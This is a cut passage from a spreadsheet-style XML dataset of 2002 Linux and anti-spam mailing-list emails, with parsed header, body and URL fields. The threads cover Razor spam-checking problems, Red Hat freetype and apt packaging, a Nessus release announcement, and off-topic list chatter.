[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://www.CounterMoon.com http://thinkgeek.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>SGP</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: Trevor Johnston &lt;trevj@redbrick.dcu.ie&gt;\nDate: Wed, 9 Oct 2002 10:01:34 +0100 (IST)</t>
  </si>
  <si>
    <t>Wed, 9 Oct 2002 10:01:34 +0100 (IST)</t>
  </si>
  <si>
    <t>Trevor Johnston &lt;trevj@redbrick.dcu.ie&gt;</t>
  </si>
  <si>
    <t>ilug@linux.ie</t>
  </si>
  <si>
    <t>Re: [ILUG] mini-itx</t>
  </si>
  <si>
    <t>On Tue, 8 Oct 2002, John Moylan wrote:\n&gt; Hmm, speaking of cheap machines etc, has anyone tried this sort of\n&gt; thing: [URL]http://www.mini-itx.com[/URL] ? or more importantly\n&gt; has anyone had any positive/negative experiences with the Via mini-itx\n&gt; boards/via c3 processors.\n\nMy laptop has a Via C3 processor. I use Debian with a self-compiled\n2.4.19 kernel, and have had absolutely no problems with the chip at all\n(quite the opposite, in fact).\n\nI had to compile for "686" in order for 3D acceleration to work (the\nkernel has an option specifically for the Via C3), but I assume that was\na kernel problem rather than a hardware problem.\n\nTrevor Johnston\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://www.mini-itx.com http://www.linux.ie</t>
  </si>
  <si>
    <t>To: &lt;razor-users@example.sourceforge.net&gt;\nFrom: Samuel Checker &lt;sc@pffcu.org&gt;\nDate: Wed, 9 Oct 2002 09:15:03 -0400 (EDT)</t>
  </si>
  <si>
    <t>Wed, 9 Oct 2002 09:15:03 -0400 (EDT)</t>
  </si>
  <si>
    <t>&lt;razor-users@example.sourceforge.net&gt;</t>
  </si>
  <si>
    <t>[Razor-users] Razor and Pine</t>
  </si>
  <si>
    <t>I've been testing Razor, invoked from sendmail/procmail and so far it\nseems pretty copacetic. Last night's spam to the list provided a good test\n- the spam itself as well as several of the responses were flagged, as\nother list members reported.\n\nThis morning I piped the messages out from pine, being careful to use the\nRAW mode, to razor-check -d. None of the messages come back as spam, even\nthe spam. Since folks revoked the false positives, I understand why they\nwould not come up, but not the spam itself, unless that also was revoked.\n\nIs this spam just a bad one to test against, or is there some setting in\npine or razor that I am missing?\n\n-- \nsc\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Matthias Saou &lt;matthias@rpmforge.net&gt;\nDate: Wed, 9 Oct 2002 08:55:08 +0200</t>
  </si>
  <si>
    <t>Wed, 9 Oct 2002 08:55:08 +0200</t>
  </si>
  <si>
    <t>Re: Zoot apt/openssh &amp; new DVD playing doc</t>
  </si>
  <si>
    <t>Once upon a time, Chris wrote : &gt; On Tue, 2002-10-08 at 10:36, Matthias Saou wrote: &gt; &gt; Hi there, &gt; &gt;  &gt; &gt; Two new things today : &gt; &gt;  &gt; &gt; 1) I've had to install a Red Hat Linux 6.2 server because of an old &gt; &gt; proprietary IVR software that doesn't work on newer releases :-( So &gt; &gt; I've recompiled both the latest apt and openssh packages for it, and &gt; &gt; they are now available with a complete "os, updates &amp; freshrpms" apt &gt; &gt; repository at apt.freshrpms.net, for those who might be interested. &gt;  &gt; Gack. Did you try 7.3 with the compat-glibc first? Or does it require an &gt; antique kernel? It requires a 2.2 kernel, plus antique just-about-everything :-/ Real crap! Matthias --  Clean custom Red Hat Linux rpm packages : [URL]http://freshrpms.net[/URL] Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi Load : 0.00 0.03 0.00 _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Matthias Haase &lt;matthias_haase@bennewitz.com&gt;\nDate: Wed, 9 Oct 2002 08:36:02 +0200</t>
  </si>
  <si>
    <t>Wed, 9 Oct 2002 08:36:02 +0200</t>
  </si>
  <si>
    <t>Matthias Haase &lt;matthias_haase@bennewitz.com&gt;</t>
  </si>
  <si>
    <t>Re: RedHat 8.0 and his own freetype</t>
  </si>
  <si>
    <t>On Tue, 08 Oct 2002 23:15:07 -0700 Ben Liblit  wrote: &gt; Ick.  Perhaps this is why Red Hat turned the bytecode interpreter off.  &gt; It may improve non-antialiased rendering, but only at the expense of  &gt; making a mess of antialiased rendering. &gt;  &gt; This may come down to a matter of personal aesthetics, but for my part,  &gt; I'm going back to Red Hat's standard packages with the bytecode  &gt; interpreter turned *off*. Yes, confirmed, but for my part, I'm using mostly non-antialiased fonts and  they are true ugly without the bytecode interpreter enabled. Remember my stupid request about your RPM ;-) --   Regards from Germany                      Matthias _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>http://lists.freshrpms.net</t>
  </si>
  <si>
    <t>unknown</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Matthias Haase &lt;matthias_haase@bennewitz.com&gt;\nDate: Wed, 9 Oct 2002 08:00:49 +0200</t>
  </si>
  <si>
    <t>Wed, 9 Oct 2002 08:00:49 +0200</t>
  </si>
  <si>
    <t>On Tue, 08 Oct 2002 13:05:53 -0700 Ben Liblit  wrote: &gt; &gt; RPM build errors: &gt; &gt;     File not found by glob: &gt; &gt; /var/tmp/freetype-2.1.2-root/usr/lib/libttf.so.* &gt; &gt;     File not found: /var/tmp/freetype-2.1.2-root/usr/lib/libttf.so &gt;  &gt; Weird.  I had no problems at all rebuilding from the SRPM with specfile &gt; modified to enable the bytecode interpreter.  The "check-files" test &gt; warns that "/usr/share/aclocal/freetype2.m4" was not included in any &gt; package, but other then that, it's all perfectly clean. Hi, Ben, it seems, the RH freetype package should be repacked, see for this [URL]https://bugzilla.redhat.com[/URL] Please, can you atach and send your sucessfully rebuild of the RH freetype rpm with the bytecode enabled to me? --    Regards from Germany                      Matthias _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>https://bugzilla.redhat.com http://lists.freshrpms.net</t>
  </si>
  <si>
    <t>ITA</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Brian Fahrlander &lt;kilroy@kamakiriad.com&gt;\nDate: Wed, 9 Oct 2002 04:27:34 -0500</t>
  </si>
  <si>
    <t>Wed, 9 Oct 2002 04:27:34 -0500</t>
  </si>
  <si>
    <t>On Wed, 9 Oct 2002 11:03:11 +0200, Matthias Saou  wrote: &gt; I don't think gpg signing my repositories will help anything, as it will &gt; just ensure that my passphrase was typed to confirm the md5 signatures of &gt; all pgklists and srclists. Basically, you'll then just be sure that it's me &gt; who generated the files, and this will of course prevent automating the &gt; process of updating the apt repository when Red Hat updates show up.     Isn't there a packager-key that's concealed inside the rpm?  Things have changed a bit since I used to work with'em, but I thought there was some internal number that must be compared to be correct (or, presumably, return an error.)   &gt; In Red Hat Linux 8.0 though, the warnings about "No Key" appear until you &gt; import the right gpg public keys directly with rpm, for example : &gt; rpm --import /usr/share/doc/apt-0.5.4cnc7/RPM-GPG-KEY &gt; (this will import my key, which is used to sign all freshrpms.net packages)     Hey, cool; wether it protects me or not, I feel better about it.   &gt; Hopefully it is possible to the tell rpm to install *only* packages who &gt; verify against an imported gpg key? This for me would be the optimal way to &gt; ensure integrity with the way things curently work.     Yeah, surely there's a flag for that; there is, for everything else, aye?  :) ------------------------------------------------------------------------ Brian Fahrlnder              Linux Zealot, Conservative, and Technomad Evansville, IN                    My Voyage: [URL]http://www.CounterMoon.com[/URL] ICQ  5119262 ------------------------------------------------------------------------ angegangen, Schlange-Hften, sein es ganz rber jetzt. Bgel innen fest, weil es eine lange, ssse Fahrt ist.  _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>http://www.CounterMoon.com http://lists.freshrpms.net</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Axel Thimm &lt;Axel.Thimm@physik.fu-berlin.de&gt;\nDate: Wed, 9 Oct 2002 00:03:53 +0200</t>
  </si>
  <si>
    <t>Wed, 9 Oct 2002 00:03:53 +0200</t>
  </si>
  <si>
    <t>Axel Thimm &lt;Axel.Thimm@physik.fu-berlin.de&gt;</t>
  </si>
  <si>
    <t>Re: Nessus?</t>
  </si>
  <si>
    <t>On Mon, Oct 07, 2002 at 11:05:21PM +0200, Matthias Saou wrote: &gt; I've put up a new Red Hat Linux 8.0 build of nessus here : &gt; [URL]http://ftp.freshrpms.net[/URL] &gt;  &gt; It's 100% untested, although the build should be ok. The new menu was &gt; added, but some configuration files may be better with new or different &gt; defaults. &gt;  &gt; Feedback is very welcome! It works very nice, would you consider upgrading it to 1.2.6 released only a few hours after your build? Thanks! On Tue, Oct 08, 2002 at 01:49:11PM +0200, Renaud Deraison wrote: &gt; I'm pleased to announce the availability of Nessus 1.2.6, which should &gt; be one of the last versions of Nessus 1.2.x (hopefully), as I will soon &gt; open a new unstable tree and start to break things again :) &gt;  &gt; What is new in Nessus 1.2.6, in comparison to 1.2.5 : &gt;  &gt; * changes by Michael Slifcak (Michael.Slifcak at guardent.com) &gt;      + Added Bugtraq cross reference in the plugins &gt;      + Added support for BID in nessusd (this has yet to be done on &gt;        the client side) &gt;         &gt; * changes by Axel Nennker (Axel.Nennker at t-systems.com) &gt;      + fixed the xml and html outputs &gt;      + fixed array issues in a couple of plugins &gt;       &gt; * changes by Michel Arboi (arboi at bigfoot.com) &gt;      + find_service now detects services protected by TCP wrappers &gt;        or ACL &gt;      + find_service detects gnuserv &gt;      + ptyexecvp() replaced by nessus_popen() (*) &gt;       &gt; * changes by Renaud Deraison (deraison at cvs.nessus.org) &gt;      + Fixed a bug which may make nasl interpret backquoted strings &gt;        (\n and \r) received from the network (problem noted by Pavel &gt;        Kankovsky) &gt;      + nmap_wrapper.nes calls _exit() instead of exit() (*) &gt;      + Solved the lack of bpf's on Free/Open/NetBSD and MacOSX by &gt;        sharing _one_ among all the Nessus processes. As a result, &gt;        Nessus's ping is much more effective on these platforms &gt;      + bugfix in plug_set_key() which would eventually make some &gt;        scripts take too long when writing in the KB &gt;      + Plugins of family ACT_SETTINGS are run *after* plugins of &gt;        family ACT_SCANNERS &gt;      + replaced the implementation of md5 which was used when &gt;        OpenSSL is disabled by the one from RSA (the old one would &gt;        not work on a big-endian host) &gt;      + Fixed plugins build issues on MacOS X &gt;      + The nessus client compiles and links against GTK+-2.0. Of &gt;        course, it will be horrible and unstable, as the GTK team &gt;        does not care about backward compatibility &gt;    &gt; (*) These two modifications solve the problems of nmap hanging under FreeBSD &gt;  &gt;  &gt;  &gt; Special thanks go to Michael Slifcak, whose work on Nessus during the &gt; last months have been truly appreciated even if they have not always &gt; been as underlined as they should have been. Michael, thanks again ! &gt;  &gt;  &gt; AVAILABILITY: &gt;  &gt; Nessus 1.2.6 is available at [URL]http://www.nessus.org[/URL] --  Axel.Thimm@physik.fu-berlin.de _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>http://ftp.freshrpms.net http://www.nessus.org http://lists.freshrpms.net</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Rohit Khare &lt;khare@alumni.caltech.edu&gt;\nDate: Wed, 7 Aug 2002 23:04:32 -0700</t>
  </si>
  <si>
    <t>Wed, 7 Aug 2002 23:04:32 -0700</t>
  </si>
  <si>
    <t>Rohit Khare &lt;khare@alumni.caltech.edu&gt;</t>
  </si>
  <si>
    <t>Perhaps Apple isn't as user-friendly as we thought...</t>
  </si>
  <si>
    <t>Sounds like the land of UNIX for the PC (Politically Correct) still has \nsome ways to go in becoming UNIX for the Rest of Us...\n\nQuoted from Mac OS X man page for sudoers(5):\n&gt;\n&gt;        insults     If set, sudo will insult users when they enter\n&gt;                    an incorrect password.  This flag is off by\n&gt;                    default.\n&gt;\n\nHey, at least Apple set the default to no-insults! :-)\n\nRohit\n\n---\nMy permanent email address is khare@alumni.caltech.edu\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://xent.com</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Magnus Bodin &lt;magnus@bodin.org&gt;\nDate: Wed, 7 Aug 2002 20:28:42 +0200</t>
  </si>
  <si>
    <t>Wed, 7 Aug 2002 20:28:42 +0200</t>
  </si>
  <si>
    <t>Magnus Bodin &lt;magnus@bodin.org&gt;</t>
  </si>
  <si>
    <t>the end of an era (fwd)</t>
  </si>
  <si>
    <t>Seems like Edsger W. Dijkstra has passed away. ------- Forwarded Message From: "Edsger W. Dijkstra"  Subject: from the family Cc: faculty@cs.utexas.edu version=2.20 Content-Type: text/plain; charset="us-ascii" ; format="flowed" Grateful for most that has befallen him, has peacefully passed away,    Edsger Wybe Dijkstra, our husband and father. We hold him very dear. The cremation will take place on Saterday, August 10th, 12:30 PM at Somerenseweg 120 Heeze the Netherlands Maria C. Dijkstra Debets Marcus J. Dijkstra Femke E. Dijkstra Rutger M. Dijktra Please forward this message to whomever you feel missing in the recipient list. ------- End of Forwarded Message [URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: "John Evdemon" &lt;jevdemon@acm.org&gt;\nDate: Wed, 7 Aug 2002 18:56:22 -0400</t>
  </si>
  <si>
    <t>Wed, 7 Aug 2002 18:56:22 -0400</t>
  </si>
  <si>
    <t>"John Evdemon" &lt;jevdemon@acm.org&gt;</t>
  </si>
  <si>
    <t>Quitting Music</t>
  </si>
  <si>
    <t>Keep your fingers crossed...\n\nExhausted Britney 'wants to quit music'\n\n[URL]http://www.thisislondon.com[/URL]\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://www.thisislondon.com http://xent.com</t>
  </si>
  <si>
    <t>GBR</t>
  </si>
  <si>
    <t>To: Digital Bearer Settlement List &lt;dbs@philodox.com&gt;,\nFrom: "R. A. Hettinga" &lt;rah@shipwright.com&gt;\nDate: Wed, 7 Aug 2002 18:37:51 -0400</t>
  </si>
  <si>
    <t>Wed, 7 Aug 2002 18:37:51 -0400</t>
  </si>
  <si>
    <t>"R. A. Hettinga" &lt;rah@shipwright.com&gt;</t>
  </si>
  <si>
    <t>Digital Bearer Settlement List &lt;dbs@philodox.com&gt;,</t>
  </si>
  <si>
    <t>Palladiated? (was re: wow - palladiated! (Re: Palladium: technical limits and implications))</t>
  </si>
  <si>
    <t>Evidently, I have permission to pass this along. :-). Don't try this at home, boys and girls. This is a professional neologist at work... Cheers, RAH Comedy is not pretty... --- begin forwarded text Date: Wed, 7 Aug 2002 22:40:56 +0100 From: Adam Back  To: "R. A. Hettinga"  Cc: Adam Back  Subject: wow - palladiated! (Re: Palladium: technical limits and implications) User-Agent: Mutt/1.2.2i On Wed, Aug 07, 2002 at 03:08:08PM -0400, R. A. Hettinga wrote: &gt; At 6:54 PM +0100 on 8/7/02, Adam Back wrote: &gt; &gt; Palladiumized &gt; &gt; Palladiated? &gt; &gt; ;-). that's pretty funny, rhymes with irradiated -- nice connotations of radioactive material with radioactive half-lives spewing life-hazardous neutron radiation ;-) Helps that palladium is in fact a heavy metal.  Man, perhaps Pd even _has_ a half-life on the decay path from plutonium down to lead or something.  That would be very funny. Adam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URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: Robert Harley &lt;harley@argote.ch&gt;\nFrom: "Adam L. Beberg" &lt;beberg@mithral.com&gt;\nDate: Wed, 7 Aug 2002 15:17:55 -0700 (PDT)</t>
  </si>
  <si>
    <t>Wed, 7 Aug 2002 15:17:55 -0700 (PDT)</t>
  </si>
  <si>
    <t>"Adam L. Beberg" &lt;beberg@mithral.com&gt;</t>
  </si>
  <si>
    <t>Robert Harley &lt;harley@argote.ch&gt;</t>
  </si>
  <si>
    <t>Re: Hurtage etc.</t>
  </si>
  <si>
    <t>On Wed, 7 Aug 2002, Robert Harley wrote:\n\n&gt; Hmm... now I have an asymptotically faster precomputation algorithm\n\nWoo, faster is better... But what have you done about all those patents that\nprevent anyone from going near ECC in the first place, hmmmmmm?\n\n- Adam L. "Duncan" Beberg\n  [URL]http://www.mithral.com[/URL]\n  beberg@mithral.com\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://www.mithral.com http://xent.com</t>
  </si>
  <si>
    <t>To: social@linux.ie\nFrom: Conor Daly &lt;conor.daly@oceanfree.net&gt;\nDate: Wed, 7 Aug 2002 13:30:59 +0100</t>
  </si>
  <si>
    <t>Wed, 7 Aug 2002 13:30:59 +0100</t>
  </si>
  <si>
    <t>Conor Daly &lt;conor.daly@oceanfree.net&gt;</t>
  </si>
  <si>
    <t>social@linux.ie</t>
  </si>
  <si>
    <t>Re: [ILUG-Social] Anyone in  Limerick want to help?</t>
  </si>
  <si>
    <t>Sorted.  I've got someone... Thanks, Conor On Tue, Aug 06, 2002 at 03:29:38PM +0100 or so it is rumoured hereabouts,  Conor Daly thought: &gt; I've had an offer of a couple of secondhand 18" LCD monitors in Limerick. &gt; Would anyone like to assist by going to test, purchase and store same for &gt; a couple of weeks (I'm in dublin and going away for a bit so I won't be &gt; able to organise collection for a while)?  Please reply off-list of you &gt; can help. --  Conor Daly  Domestic Sysadmin :-) --------------------- Faenor.cod.ie   1:32pm  up 75 days, 22:50,  0 users,  load average: 0.00, 0.00, 0.00 Hobbiton.cod.ie   1:30pm  up 18 days, 19:54,  1 user,  load average: 0.24, 0.12, 0.03 --  Irish Linux Users' Group Social Events: social@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://www.linux.ie</t>
  </si>
  <si>
    <t>To: social@linux.ie\nFrom: David Neary &lt;bolsh@gimp.org&gt;\nDate: Wed, 7 Aug 2002 11:01:30 +0200</t>
  </si>
  <si>
    <t>Wed, 7 Aug 2002 11:01:30 +0200</t>
  </si>
  <si>
    <t>David Neary &lt;bolsh@gimp.org&gt;</t>
  </si>
  <si>
    <t>Re: [ILUG-Social] Online Bookstores</t>
  </si>
  <si>
    <t>Caolan McNamara wrote:\n&gt; On Tue, Aug 06, 2002 at 04:21:22 +0100, David O'Callaghan wrote:\n&gt; &gt; \n&gt; &gt; Hello,\n&gt; &gt; \n&gt; &gt; What are your recommendations for buying books (technical and\n&gt; &gt; otherwise) online, from Irish or European sellers. Is there \n&gt; &gt; anywhere that has as good a selection as, say, Amazon but\n&gt; &gt; deals in Euro?\n&gt; \n&gt; amazon.de and amazon.fr ? :-)\n\nHaving recently checked out both of these, for a selection of\nbooks, the exact same basket of books cost more in both .de and\n.fr (taking delivery charges, VAT et al into account) than buying\nthe same thing in amazon.co.uk\n\nThe books I used to check were \n1) C unleashed (Heathfield et al)\n2) Design Patterns (Gamma et al)\n3) Computer Graphics, principles and practice (Foley et al)\n\nI was hugely surprised that amazon.co.uk worked out cheapest - by\na considerable margin, too - something like 12 euros after\nfreight was taken into account.\n\nCheers,\nDave.\n\n-- \n       David Neary,\n    Marseille, France\n  E-Mail: bolsh@gimp.org\n\n-- \nIrish Linux Users' Group Social Events: social@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: "ML-razor-users" &lt;razor-users@example.sourceforge.net&gt;\nFrom: "Daniel Higgins" &lt;dhiggins@netc.net&gt;\nDate: Wed, 7 Aug 2002 10:54:51 -0400</t>
  </si>
  <si>
    <t>Wed, 7 Aug 2002 10:54:51 -0400</t>
  </si>
  <si>
    <t>"Daniel Higgins" &lt;dhiggins@netc.net&gt;</t>
  </si>
  <si>
    <t>"ML-razor-users" &lt;razor-users@example.sourceforge.net&gt;</t>
  </si>
  <si>
    <t>Re: [Razor-users] What's wrong with the Razor servers now?</t>
  </si>
  <si>
    <t>except that the server doesn't know you are the same person that reported the spam, since the identity isn't checked (at least not required, so i assume it's not checked) when doing a razor-check -- Daniel Higgins Administrateur Systme Netcommunications Inc. ----- Original Message ----- From: "Tabor J. Wells"  To: "Daniel Higgins"  Cc: ; "ML-razor-users"  Sent: Wednesday, August 07, 2002 10:39 AM Subject: Re: [Razor-users] What's wrong with the Razor servers now? &gt; On Wed, Aug 07, 2002 at 10:22:13AM -0400, &gt; Daniel Higgins  is thought to have said: &gt; &gt; &gt; maybe i'm wrong, but it could be that your trust isn't high enough to flag a &gt; &gt; single message as spam? &gt; &gt; It would seem to make sense that regardless of your TeS value, the &gt; signatures you report should always come back as spam when you check them &gt; since you should always be able to trust yourself. :) &gt; &gt; -- &gt; -------------------------------------------------------------------- &gt; Tabor J. Wells                                razor-users@fsckit.net &gt; Fsck It!                 Just another victim of the ambient morality &gt; &gt; &gt; ------------------------------------------------------- &gt; This sf.net email is sponsored by:ThinkGeek &gt; Welcome to geek heaven. &gt; [URL]http://thinkgeek.com[/URL] &gt; _______________________________________________ &gt; Razor-users mailing list &gt; Razor-users@lists.sourceforge.net &gt; [URL]https://lists.sourceforge.net[/URL] &gt; ------------------------------------------------------- This sf.net email is sponsored by:ThinkGeek Welcome to geek heaven. [URL]http://thinkgeek.com[/URL] _______________________________________________ Razor-users mailing list Razor-users@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://thinkgeek.com https://lists.sourceforge.net http://thinkgeek.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: social@linux.ie\nFrom: kevin lyda &lt;kevin+dated+1029143922.62a561@ie.suberic.net&gt;\nDate: Wed, 7 Aug 2002 10:18:41 +0100</t>
  </si>
  <si>
    <t>Wed, 7 Aug 2002 10:18:41 +0100</t>
  </si>
  <si>
    <t>kevin lyda &lt;kevin+dated+1029143922.62a561@ie.suberic.net&gt;</t>
  </si>
  <si>
    <t>On Tue, Aug 06, 2002 at 04:24:09PM +0100, Joe Desbonnet wrote:\n&gt; I've found Micromail in Cork quite good:\n\nplay247.com seems to be a good site for dvd's.  prices are in sterling,\nbut they have free shipping.  plus they're selling buffy season 5 dvd's\nfor 10 less then blackstar...\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Social Events: social@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://ie.suberic.net http://www.linux.ie</t>
  </si>
  <si>
    <t>DEU</t>
  </si>
  <si>
    <t>To: social@linux.ie\nFrom: "Breathnach, Proinnsias (Dublin)" &lt;breatpro@exchange.ie.ml.com&gt;\nDate: Wed, 7 Aug 2002 10:00:11 +0100</t>
  </si>
  <si>
    <t>Wed, 7 Aug 2002 10:00:11 +0100</t>
  </si>
  <si>
    <t>"Breathnach, Proinnsias (Dublin)" &lt;breatpro@exchange.ie.ml.com&gt;</t>
  </si>
  <si>
    <t>RE: [ILUG-Social] Online Bookstores</t>
  </si>
  <si>
    <t>What's wrong with good ol' [URL]www.eason.ie[/URL] ?\n\nDelivery isn't too expensive, and they seem to have a reasonable stocklist\n... not only that, but they've got b&amp;m[0] stores too ...\n\nP\n[0] Bricks 'n' Mortar\n\n&gt; -----Original Message-----\n&gt; &gt; On Tue, Aug 06, 2002 at 04:21:22 +0100, David O'Callaghan wrote:\n&gt; &gt; &gt; \n&gt; &gt; &gt; Hello,\n&gt; &gt; &gt; \n&gt; &gt; &gt; What are your recommendations for buying books (technical and\n&gt; &gt; &gt; otherwise) online, from Irish or European sellers. Is there \n&gt; &gt; &gt; anywhere that has as good a selection as, say, Amazon but\n&gt; &gt; &gt; deals in Euro?\n&gt; \n\n\n-- \nIrish Linux Users' Group Social Events: social@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>www.eason.ie http://www.linux.ie</t>
  </si>
  <si>
    <t>To: &lt;mail@vipul.net&gt;\nFrom: "Rose, Bobby" &lt;brose@med.wayne.edu&gt;\nDate: Wed, 7 Aug 2002 09:15:45 -0400</t>
  </si>
  <si>
    <t>Wed, 7 Aug 2002 09:15:45 -0400</t>
  </si>
  <si>
    <t>"Rose, Bobby" &lt;brose@med.wayne.edu&gt;</t>
  </si>
  <si>
    <t>&lt;mail@vipul.net&gt;</t>
  </si>
  <si>
    <t>RE: [Razor-users] What's wrong with the Razor servers now?</t>
  </si>
  <si>
    <t>The problem is clearly because the info isn't syncing between the\nservers.  If I run the check against honor which is where it was\nreported then the check is positive.  If I run the check against apt or\nfire, it's negative.\n\n-----Original Message-----\nFrom: Rose, Bobby \nSent: Wednesday, August 07, 2002 9:05 AM\nTo: mail@vipul.net\nCc: ML-razor-users\nSubject: RE: [Razor-users] What's wrong with the Razor servers now?\n\n\nIt's still doing it.  I reported a message as spam 10 minutes ago and\nthe check keeps coming back false.  What's funny is that message that\nI'm testing with it the sample-spam.txt message from SpamAssassin and I\nknow it's been reported before.\n\n-----Original Message-----\nFrom: Vipul Ved Prakash [mailto:mail@vipul.net] \nSent: Wednesday, August 07, 2002 3:45 AM\nTo: Rose, Bobby\nCc: ML-razor-users\nSubject: Re: [Razor-users] What's wrong with the Razor servers now?\n\n\nHi,\n\nWe were rolling out changes to TeS and catalogue servers over the last\ntwo days. Any glitches you might have experienced would have been due to\nthe upgrades. The upgrades are now complete, and things are back to\nnormal. Several new features in TeS will provide better accuracy,\nspecially with regards to false-positives.\n\ncheers,\nvipul.\n\nOn Tue, Aug 06, 2002 at 06:54:04PM -0400, Rose, Bobby wrote:\n&gt; I'm still seeing this.  It reports to honor.cloudmark.com but checks\n&gt; against apt.cloudmark.com.  What is the sync delay between these \n&gt; boxes?\n&gt; \n&gt; -----Original Message-----\n&gt; From: Rose, Bobby\n&gt; Sent: Monday, August 05, 2002 2:05 PM\n&gt; To: ML-razor-users\n&gt; Subject: [Razor-users] What's wrong with the Razor servers now?\n&gt; \n&gt; \n&gt; I noticed a low count of razor'd spam messages. So after digging, if I\n\n&gt; razor-report a message the diags say that it was accepted but if I\n&gt; turn around and run a check on the exact same message that was \n&gt; reported, then it doesn't find the sig and as such isn't spam.\n&gt; \n&gt; \n&gt; -------------------------------------------------------\n&gt; This sf.net email is sponsored by:ThinkGeek\n&gt; Welcome to geek heaven.\n&gt; [URL]http://thinkgeek.com[/URL]\n&gt; _______________________________________________\n&gt; Razor-users mailing list\n&gt; Razor-users@lists.sourceforge.net\n&gt; [URL]https://lists.sourceforge.net[/URL]\n&gt; \n&gt; \n&gt; -------------------------------------------------------\n&gt; This sf.net email is sponsored by:ThinkGeek\n&gt; Welcome to geek heaven.\n&gt; [URL]http://thinkgeek.com[/URL]\n&gt; _______________________________________________\n&gt; Razor-users mailing list\n&gt; Razor-users@lists.sourceforge.net \n&gt; [URL]https://lists.sourceforge.net[/URL]\n\n-- \n\nVipul Ved Prakash          |   "The future is here, it's just not \nSoftware Design Artist     |    widely distributed."\n[URL]http://vipul.net[/URL]          |              -- William Gibson\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL] _______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://thinkgeek.com https://lists.sourceforge.net http://thinkgeek.com https://lists.sourceforge.net http://vipul.net http://thinkgeek.com https://lists.sourceforge.net http://thinkgeek.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: &lt;mail@vipul.net&gt;\nFrom: "Rose, Bobby" &lt;brose@med.wayne.edu&gt;\nDate: Wed, 7 Aug 2002 09:04:50 -0400</t>
  </si>
  <si>
    <t>Wed, 7 Aug 2002 09:04:50 -0400</t>
  </si>
  <si>
    <t>It's still doing it.  I reported a message as spam 10 minutes ago and\nthe check keeps coming back false.  What's funny is that message that\nI'm testing with it the sample-spam.txt message from SpamAssassin and I\nknow it's been reported before.\n\n-----Original Message-----\nFrom: Vipul Ved Prakash [mailto:mail@vipul.net] \nSent: Wednesday, August 07, 2002 3:45 AM\nTo: Rose, Bobby\nCc: ML-razor-users\nSubject: Re: [Razor-users] What's wrong with the Razor servers now?\n\n\nHi,\n\nWe were rolling out changes to TeS and catalogue servers over the last\ntwo days. Any glitches you might have experienced would have been due to\nthe upgrades. The upgrades are now complete, and things are back to\nnormal. Several new features in TeS will provide better accuracy,\nspecially with regards to false-positives.\n\ncheers,\nvipul.\n\nOn Tue, Aug 06, 2002 at 06:54:04PM -0400, Rose, Bobby wrote:\n&gt; I'm still seeing this.  It reports to honor.cloudmark.com but checks \n&gt; against apt.cloudmark.com.  What is the sync delay between these \n&gt; boxes?\n&gt; \n&gt; -----Original Message-----\n&gt; From: Rose, Bobby\n&gt; Sent: Monday, August 05, 2002 2:05 PM\n&gt; To: ML-razor-users\n&gt; Subject: [Razor-users] What's wrong with the Razor servers now?\n&gt; \n&gt; \n&gt; I noticed a low count of razor'd spam messages. So after digging, if I\n\n&gt; razor-report a message the diags say that it was accepted but if I \n&gt; turn around and run a check on the exact same message that was \n&gt; reported, then it doesn't find the sig and as such isn't spam.\n&gt; \n&gt; 